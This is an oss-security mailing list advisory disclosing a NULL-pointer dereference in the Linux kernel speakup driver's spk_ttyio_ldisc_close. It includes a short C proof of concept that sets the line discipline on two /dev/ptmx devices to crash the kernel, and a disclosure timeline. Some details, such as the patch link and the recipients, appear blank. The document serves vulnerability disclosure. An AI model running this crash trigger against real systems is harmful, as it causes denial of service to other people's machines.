Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 19 Nov 2020 10:46:59 +0800
From: Shisong Qin <>
Subject: Linux kernel NULL-ptr deref bug in spk_ttyio_ldisc_close


Recently we found a NULL-ptr deref BUG in spk_ttyio.c in the longterm 4.19
Linux kernel, and it could also be triggered in the 5.9 Linux kernel. In
function spk_ttyio_ldisc_close, it would free the "speakup_tty->disc_data"
and set "speakup_tty" to NULL. However, if we open two tty device and use
tiocsetd() to set them as "speakup_tty" and close them in turn, the first
close would set "speakup_tty" to NULL, and in the second close would try to
dereference the "speakup_tty", leading to a NULL-ptr deref crash.

This bug could be reproduced in the longterm 4.19 Linux kernel with
To reproduce it in the 5.9 Linux kernel, CONFIG_ACCESSIBILITY=y is also
required in config, and here is a simple poc:

#define _GNU_SOURCE

#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

int main(void) {
    int disc = 0x1a;
    int fd = open("/dev/ptmx", O_RDWR, 0);
    ioctl(fd, 0x5423, &disc);
    int fd2 = open("/dev/ptmx", O_RDWR, 0);
    ioctl(fd2, 0x5423, &disc);
    return 0;

After the process return, it seems the automated calling to release would
trigger the NULL-ptr deref bug.

Here is the commit to patch this BUG:

* 2020/11/10 - Vulnerability reported to
* 2020/11/11 - Vulnerability confirmed, and reported to
* 2020/11/19 - Vulnerability opened.

Shisong Qin and Bodong Zhao, Tsinghua University

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.